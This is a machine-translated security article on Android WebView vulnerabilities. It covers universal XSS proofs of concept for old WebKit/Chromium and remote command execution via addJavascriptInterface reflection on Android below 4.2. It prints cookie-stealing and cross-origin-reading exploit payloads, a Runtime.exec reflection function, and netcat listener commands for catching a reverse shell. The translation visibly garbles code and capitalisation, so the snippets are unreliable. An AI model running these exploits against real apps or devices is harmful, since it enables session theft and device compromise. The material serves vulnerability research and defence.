1. What is WebView UXSS
WebView is the underlying component of the Android Chrome browser and is the core class in the WebKit framework, derived from view in the Android SDK to not invoke the browser in Android Activity layout. directly implement basic browser functions such as displaying Web pages.
The basic usage of WebView in Android programs is as follows:
Layout file
<?xml version= "1.0" encoding= "Utf-8"? ><webview xmlns:android= "Http://schemas.android.com/apk/res/android "Android:id=" @+id/webview "android:layout_width=" fill_parent "android:layout_height=" Fill_parent "/>
Loading Web pages
WebView Mywebview = (WebView) Findviewbyid (R.id.webview); Mywebview.loadurl ("http://www.example.com");
Declare in Manifest
<manifest > <uses-permission android:name= "Android.permission.INTERNET"/> ...</manifest>
Because XSS vulnerabilities exist in WebView that do not depend on specific Web sites and terminal platforms, they exist in WebKit-based browsers and are therefore referred to as Universal XSS--UXSS.
2. Google's public WebView UXSS
Poc:
Hehe.html<iframe name= "test" src= "http://www.g.cn" ></iframe><input type=button value= "test" onclick= "Window.Open (' \u0000javascript:alert (document.cookie) ', ' Test ')" >
Or
<iframe name= "test" src= "http://www.g.cn" ></iframe><input type=button value= "test" onclick= " window.open (' \x00javascript:alert (document.cookie) ', ' Test ') ' >
Poc:
<script>i = Document.body.appendChild (document.createelement ("iframe")); i.src = "http://google.com"; i.onload = function () {Document.documenturi = "Javascript://hostname.com/%0d%0aalert (' OH HAI ' + location)"; I.contentwindow.location = "";} </script>
Poc:
<script>window.onload = function () {object = Document.createelement ("Object"); Object.data = "http://google.com/"; Document.body.appendChild (object); Object.onload = function () {object.data = "Javascript:alert (Document.body.innerHTML)"; object.innerhtml = "Foo"; }}</script>
The bug mentions four ways to handle frame-led UXSS.
One of the poc:inserting the target frame element during the execution of the helper frame element ' s onunload handler, after all Candidates for the child frame Disconnector has been collected.
container = Document.body.appendChild (document.createelement ("div")); helperframe = Container.appendchild ( Document.createelement ("iframe")); targetframe = Document.createelement ("iframe"); HelperFrame.contentWindow.onunload = function () {Container.insertbefore (targetframe, helperframe);} Document.body.removeChild (container); alert (Targetframe.contentwindow);
in V8natives.js of Chromium
function Newfunction (arg1) {... var source = ' (function (' + p + ') {\ n ' + body + ' \ n}) ', .... var f =%compilestring (Sourc e) ();
When the ' this ' pointer points to a V8 Builtins object, the user provides a custom body that causes the JavaScript code to execute
POC:javascript:Function ("},alert (This), {").
More detailed Expoit
<body><script>frame = document.body.appendchild (Document.createelement ("iframe")); frame.src = "http://xkcd.com/"; Frame.onload = function () { function ("}, (Builtins = this), function () {"); originalinstantiate = builtins. Instantiate; builtins. Defineoneshotaccessor (builtins, "Instantiate", function () {}); flag = 0; template = null ; builtins. Instantiate = function (x, y) { if (flag) { doc = frame.contentwindow.document; alert (Doc.body.innerHTML); flag = 0; } else if (!template) template = x; return originalinstantiate (X, y); }; document.implementation; flag = 1; Builtins. Configuretemplateinstance (frame.contentwindow, template);} </script></body>
Someone on Wooyun developed a mobile browser UXSS vulnerability Online test page http://uxss.sinaapp.com
The currently included POC includes:
' https://code.google.com/p/chromium/issues/detail?id=143437 '
' https://code.google.com/p/chromium/issues/detail?id=37383 ',
' https://code.google.com/p/chromium/issues/detail?id=143439 '
' https://code.google.com/p/chromium/issues/detail?id=98053 '
' Https://code.google.com/p/chromium/issues/detail?id=117550 '
' https://code.google.com/p/chromium/issues/detail?id=90222 '
With UXSS, you can bypass the same-origin policy to execute JS, if the Access attack page in the app using WebView has access to local files, with the session cookie and password sensitive information, local files and sensitive information may be stolen.
3. More Dangerous WebView Addjavascriptinterface interface
This interface is used to implement local Java and JS interaction, using Addjavascriptinterface This interface function can be implemented JS injection webview Call native Java method, even control the Android system
When Android uses the WebView Addjavascriptinterface interface, and the compile API level is less than 4.2, there may be a WebView remote code execution vulnerability, and the exploit depends on the use of WebView The permissions that the app has.
The following code illustrates how Addjavascriptinterface is used in WebView,
public classmainactivityextendsactivity { privateWebViewmyWebView; @Override protectedvoidoncreate (bundle savedinstancestate) { super.oncreate (savedInstanceState); mywebview=newwebview (This); Mywebview.getsettings (). Setjavascriptenabled (True); // allow execution javascript mywebview.addjavascriptinterface (Newjavascriptinterface (), "Jsinterface"); // Registers an object named Jsinterface, which is accessed by JS and calls its methods. mywebview.loadurl ("http://192.168.3.155/attackwv.html"); // WebView loading called Jsinterface's Web page setcontentview (mywebview); } finalclassJavaScriptInterface { JavaScriptInterface () { } Publicstring getsomestring () { return "Hello, world"; } }}
In Attackwv.html, a simple call to the
The performance in the Android 4.1.2 Simulator is as follows, the method of Javascriptinterface in WebView was successfully called through JS.
But we are not just content to print Hello World, is there a way to execute arbitrary commands remotely?
The answer is: You can take advantage of Java's reflection mechanism to get the Java.lang.Runtime object and execute arbitrary commands, the permissions of which depend on the app permissions that use WebView.
The modified attackwv1.html, as shown below, can be successfully implemented using the EXECUTE function to rebound the shell
Open two shell windows in 192.168.3.166,
Nc-l-VV 8088
Nc-l-VV 9999
Successfully acquired the shell of the Android 4.1.2 Simulator.
The limitation of this method is that the interface name Jsinterface must be known. But by exhaustive loading the Web Page object now, to determine whether it supports Java reflection, can also get a call Java method object without knowing the interface name, the amended execute as follows,
function Execute (CMD) {for (var obj. window) {if ("GetClass" in Window[obj]) {return Window[obj].getclass (). forname ("Java.lang.Runtime"). GetMethod ("GetRuntime", null). Invoke (null,null). exe C (CMD); } } }
Android WebView Security Research